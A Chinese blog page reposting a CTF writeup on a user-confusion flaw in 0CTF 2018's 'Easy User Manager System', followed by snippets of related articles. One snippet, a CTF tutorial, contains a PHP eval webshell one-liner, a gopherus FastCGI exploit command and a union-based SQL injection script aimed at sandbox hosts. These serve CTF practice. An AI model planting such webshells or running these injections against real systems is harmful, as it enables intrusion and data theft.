Easy User Manager System writeup

最新推荐文章于 2022-10-21 15:55:18 发布
转载 最新推荐文章于 2022-10-21 15:55:18 发布 · 186 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/Mrsm1th/p/8719328.html

本文介绍了一种利用用户混淆漏洞获取Flag的方法。通过在不同浏览器中分别申请自己的IP和目标IP的验证码,在适当时机切换并提交,使服务器误认为提交的是目标IP的凭证,从而实现Flag的获取。

0x01 解题

思路

一个进程用自己的ip去申请拿到code然后进入verify页面,另外一个进程去申请8.8.8.8

步骤

1. 首先注册一个账号 然后用两个不同的浏览器进入Change页面。这里我使用的是火狐申请自己的ip 谷歌申请8.8.8.8
2. 用火狐申请自己的Ip然后得到verifycode,输入但不要提交。
3. 谷歌这边输入8.8.8.8然后点击申请verifycode然后马上换至火狐浏览器点击提交。成功Getflag

ez user manager.png

0x02 思考

漏洞产生的原因在于后端验证不严造成的用户混淆。

先申请8.8.8.8 然后提交自己ip的verifycode让服务器认为输入的是8.8.8.8的凭证。

漏洞实例 任意用户名密码重置(三):用户混淆

学到的新姿势。。

转载于:https://www.cnblogs.com/Mrsm1th/p/8719328.html

Berry2014
关注
HTB HARD 靶机 Cerberus WriteUp
qq_58869808的博客
03-26 8881
HTB Cerberus hard!!!靶机writeUp
[BUUCTF] easy_tornado (writeup)
weixin_63306244的博客
06-10 382
tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}}进行传递变量和执行简单的表达式。根据 flag.txt 和 hints.txt 的提示我们得出flag在/fllllllllllllag里面。回显了orz,回想welcome.txt 有提示render。有了cookie_secret后根据hints.txt。进入靶机后发现了三个文件,分别是。由此得到payload为。
UserManager的使用
renshuguo123723的博客
01-25 9663
前沿:在手机的Settings当中,有一项菜单栏是用来管理手机的当前用户的,点开这个菜单栏,会发现系统将手机用户分成了3类,分别是管理员,访客和自定义用户; 管理员,访客是系统为我们预设的,自定义用户可由我们自由添加或者删除; 并且这些用户是相互可以切换的,每个用户都有与之对应的系统属性; 这3类用户用UserManager进行管理,今天我们并不是来分析UserManager,而是看下系统是...
【源码剖析2】framework 源码 3——UserManagerService之多用户的创建代码详解
dax120的博客
07-03 937
上文提到创建用户的方法: 核心代码是createUserInternalUnchecked 在此方法中要完成一个用户的创建。首先是通过flag区分需要创建用户的类型,然后不同类型在信息的使用上会有不同差别。 总的来说,创建时兼顾了各种类型的user,并且给新用户提供userId和UserInfo两个重要参数。 需要注意的是,创建用户并不会使用户显示出来。要显示用户是通过多用户切换功能...
[Android 5.1] 多用户管理UserManager相关整理
vivisoul的专栏
12-22 8629
1. 概述当前版本(Android 5.1)下,多用户管理适用于平板模式(手机版本可能受限于版本等原因)。 多用户模式下,不同用户运行在不同的用户空间,共享具体的应用实例(即不同的用户下,其应用版本是一致的),但拥有各自不同的配置。 本文不会对具体的代码进行解读,只会对相关概念、关联性较强的部分加以说明,目的在于对Android下多用户管理进行整体描述。 主要相关的代码路径如下: fram
0CTF2018 Easy User Manager System writeup
1CHIG0的博客
04-05 689
菜的不行,比赛时进入了登录页面后要修改ip时完全没有思路,只能水一水等比赛结束看师傅们的WP这样子,我什么时候才能像师傅们一样优秀。参考了https://www.cnblogs.com/Mrsm1th/p/8719328.html。首先打开链接,登录页面如下:可知需要登录后才可以进行下一步。首先注册,发现服务器会向所填写的ip地址的80端口发送一条消息,于是监听80端口登陆一下,得到vcode:登...
CTFSHOW 内部赛web writeup
ashMOB的博客
10-29 5364
CTFSHOW 内部赛web writeup 太菜了不会写,按着羽师傅和bmth666师傅的writeup复现 签到 打开界面如上,右键源码可以看到有一个register.php注册界面,需要利用login和register界面来进行sql盲注,sql太菜了连代码都看不懂,直接贴师傅们写的脚本 import requests import re url1 = "http://dd2ae20d-7588-4d04-af33-86ce7a48313d.challenge.ctf.show/register.
MTCTF Writeup By Light1ng
Le1a's Blog
10-21 959
下载附件,是一个flask框架,然后很明显的存在pickle反序列化,首先我们需要伪造session成为admin。爆破得到key为6284,现在就可以通过来伪造session。目前就成功伪造了session。接下来看看后面的反序列化逻辑。从session中获取ser_data键的值,然后替换掉一些字符,然后过滤R i o b,就没法用pker来生成payload了,这里直接手搓opcode了,然后现在只需要把这个base64编码一下,然后作为ser_data的值,写入session即可。
【Vulnhub】Litterally
4ut15m's blog
01-23 952
Litterally_WriteUp@4ut15m 信息搜集 使用nmap 扫描存活主机 nmap -sP 192.168.0.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-23 20:27 CST Nmap scan report for 192.168.0.1 Host is up (0.0059s latency)....
一些关于ROS的讨论 Robot Operating System – A flexible framework for writing robot software (ros.org)
zhangrelay的专栏
09-10 2551
https://news.ycombinator.com/item?id=17916456   Robot Operating System – A flexible framework for writing robot software (ros.org) 165 points by doener 4 days ago | hide | past | web | favorite | ...
WriteUp模板1
08-08
WriteUp模板1-文档编写指南 WriteUp模板1是用于编写解题报告的模板,旨在帮助参与校赛的选手编写高质量的解题报告。本文将详细介绍 WriteUp 模板1 的结构和编写要求,帮助选手更好地编写解题报告。 标题 WriteUp ...
BUUCTF Reverse [ACTF新生赛2020]easyre WriteUp
PlumpBoy的博客
09-11 673
easyre-WP 打开后先查查有无壳,发现是UPX加密 kali直接脱壳,命令为upx -d easyre.exe 脱完壳直接放入IDA查看反汇编代码 int __cdecl main(int argc, const char **argv, const char **envp) { _BYTE v4[12]; // [esp+12h] [ebp-2Eh] BYREF _DWORD v5[3]; // [esp+1Eh] [ebp-22h] _BYTE v6[5]; // [esp+2Ah]
攻防世界Reverse进阶区-easy_Maze-writeup
y4ung
12-04 919
1. 介绍 本题是xctf攻防世界中Reverse的进阶区的题easy_Maze 2. 分析 $ file easy_Maze easy_Maze: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=0cb6db3836551a104de9a42d40
京东评论文本情感分析与产品口碑挖掘系统_基于jieba中文分词与TF-IDF特征提取的文本挖掘项目_用于分析京东手机用户评论中的观点态度情绪立场及主观情感_通过探索性分析观测数据信.zip
12-15
京东评论文本情感分析与产品口碑挖掘系统_基于jieba中文分词与TF-IDF特征提取的文本挖掘项目_用于分析京东手机用户评论中的观点态度情绪立场及主观情感_通过探索性分析观测数据信.zip
GB 17927-2024家具阻燃性能通家规范.rar
12-15
GB 17927-2024家具阻燃性能通家规范.rar
大规模MIMO通信系统的发射端采用混合波束成形(Matlab代码实现)
12-15
大规模MIMO通信系统的发射端采用混合波束成形(Matlab代码实现)内容概要:本文主要介绍了一个关于大规模MIMO通信系统中发射端采用混合波束成形技术的研究,并提供了相应的Matlab代码实现。混合波束成形结合了数字和模拟波束成形的优势,旨在降低硬件成本和功耗的同时提升系统性能。文中详细阐述了该技术的基本原理、数学模型构建、算法设计及仿真验证过程,展示了如何通过Matlab进行系统建模与性能评估,包括波束方向图、频谱效率等关键指标的分析。此外,文档还列举了多个相关的科研方向和技术应用案例,体现出其在现代无线通信领域的广泛应用前景。; 适合人群:具备通信工程、电子信息类专业背景,熟悉Matlab编程,有一定无线通信理论基础的研究生或科研人员。; 使用场景及目标:①深入理解大规模MIMO系统中混合波束成形的技术原理与实现方法;②掌握利用Matlab进行通信系统仿真建模的关键技能;③为相关课题的科研工作提供算法参考与代码基础。; 阅读建议:建议读者结合通信原理和阵列信号处理知识进行学习,重点理解波束成形的数学推导与Matlab实现之间的对应关系,动手运行并修改代码以加深对算法细节的理解。
【未发表】基于凌日优化算法TSOA优化鲁棒极限学习机RELM实现负荷数据回归预测算法研究附Matlab代码.zip
12-15
1.版本:matlab2014a/2019b/2024b 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
Puma构型六轴机械臂运动学matlab仿真.zip
12-15
1.版本:matlab2014a/2019b/2024b 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
【计算机视觉】YOLOv11至v13系列模型在VOC2007数据集上的检测精度对比与训练策略分析-下篇
最新发布
12-15
内容概要:本文详细对比了YOLOv11、YOLOv12和YOLOv13在相同实验条件下的目标检测精度与训练性能,重点分析了不同优化器(AdamW与SGD)、训练轮数(50epoch vs 600epoch)以及是否使用flash_attn加速模块对模型表现的影响。通过在VOC2007数据集上的实验结果显示,YOLOv11在使用AdamW优化器时表现最佳(mAP@0.5达0.614),而YOLOv12和YOLOv13虽采用更先进架构,但精度反而下降,且更适合使用SGD优化器进行长时间训练。此外,flash_attn可略微提升训练速度约7%,但对最终精度影响甚微。文章还提供了完整的训练代码与常见问题解决方案,如Arial字体路径配置和flash_attn兼容性问题排查方法。 适合人群:从事计算机视觉方向的算法工程师、深度学习研究人员及有一定目标检测基础的学生(工作或研究经验1-3年)。 使用场景及目标:①比较YOLO系列新版本之间的性能差异;②选择合适的优化器与训练策略提升模型效果;③解决实际训练中flash_attn安装与调用问题。 阅读建议:此资源以实测数据为基础,强调实践验证,建议读者结合自身环境复现实验,重点关注超参数设置、环境配置细节,并根据实际任务需求评估模型选型。
writeup
09-26
以下是部分 CTFHub web 基础教程的 writeup: - **信息泄漏**: ```bash # 安装 dirsearch 包 sudo apt-get install dirsearch # 目录扫描,-u 用于指定要扫描的 URL sudo dirsearch -u "http://challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/" # 进入相关目录 ls cd site ls cd challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/ ls # 扫描程序获取当前 Git 仓库的提交历史信息 git log # 在 Git 中配置一个名为 safe.directory 的全局设置,指定安全目录 git config --global --add safe.directory /home/kali/Desktop/GitHack/site/challenge-74ace4f302db1181.sandbox.ctfhub.com:10800 ls git log ``` - **SSRF 通关攻略之 FastCGI 协议**: ```bash # 在 kali 里下载 gopherus 工具并解压 git clone https://github.com/tarunkant/Gopherus.git # 在文件里打开终端,执行命令 python2 gopherus.py --exploit fastcgi ``` 判断文件是否存在,通过访问不同文件观察返回信息: ```bash # 尝试访问首页文件 访问首页文件 index.php # 访问不存在的文件 输入 wjf.php 显示 404,说明 index.php 存在 ``` 注入木马及编码操作: ```bash # 一句话木马 <?php @eval($_POST['cmd']);?> # base64 编码 PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= # 解码并保存为 shell.php echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" | base64 -d > shell.php ``` 连接木马: ```bash # 打开蚁剑,右键添加数据,添加木马文件 http://challenge-641b288f17028a60.sandbox.ctfhub.com:10800/wjf123.php ``` - **SQL 注入**: ```python import requests def mySQL(payload): url = 'http://challenge-196392c6b0acebd8.sandbox.ctfhub.com:10800/' header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36", "Cookie": "id=-1 " + payload + "; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F", } r = requests.get(url, headers=header) return r.text print(mySQL("union select 1,group_concat(schema_name)from information_schema.schemata")) print(mySQL("union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'")) print(mySQL("union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='srdnlrlphq'")) print(mySQL("union select 1,group_concat(icehhmfjxt) from sqli.srdnlrlphq")) ``` - **XSS**:分析完后利用前面的 XSS 网站生成 XSS 攻击代码。注册完进入页面,点击“我的项目”后面的“创建”,选择默认配置,拉到最下面点击“下一步”,将生成的代码拼接到原题目网址后面的 `?name=` 后面,再输入到第二个框内,点击“send”。成功后回到 XSS 网站点击项目内容查看记录[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值